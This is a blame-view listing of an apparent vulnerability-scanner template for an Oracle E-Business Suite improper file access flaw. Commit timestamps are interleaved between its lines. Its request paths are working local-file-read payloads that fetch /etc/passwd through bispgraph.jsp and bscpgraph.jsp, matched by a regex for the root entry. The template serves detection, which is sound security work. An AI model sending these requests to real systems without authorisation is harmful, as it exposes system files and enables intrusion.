2020-07-28 15:14:22 +00:00
id : oracle-ebs-bispgrapgh-file-read
2020-08-25 19:43:43 +00:00
2020-07-31 10:02:19 +00:00
info :
2022-05-26 19:56:32 +00:00
name : Oracle eBusiness Suite - Improper File Access
2021-06-09 12:20:56 +00:00
author : emenalf,tirtha_mandal,thomas_from_offensity
2020-08-31 18:34:29 +00:00
severity : critical
2022-05-31 09:02:35 +00:00
description : |
Oracle eBusiness Suite is susceptible to improper file access vulnerabilities via bispgrapgh. Be aware this product is no longer supported with patches or security fixes.
2021-08-18 11:37:49 +00:00
reference :
2021-05-05 14:32:21 +00:00
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
2022-04-22 10:38:41 +00:00
tags : oracle,lfi
2020-08-25 19:43:43 +00:00
2020-07-28 15:14:22 +00:00
requests :
- method : GET
2020-07-31 10:02:19 +00:00
path :
2020-07-28 15:14:22 +00:00
- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
2020-10-07 22:19:59 +00:00
- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
2020-07-28 15:14:22 +00:00
2020-07-31 10:02:19 +00:00
matchers :
2020-07-28 15:14:22 +00:00
- type : regex
2022-05-31 09:02:35 +00:00
part : body
2020-07-28 15:14:22 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2022-05-26 19:56:32 +00:00
# Enhanced by mp on 2022/05/26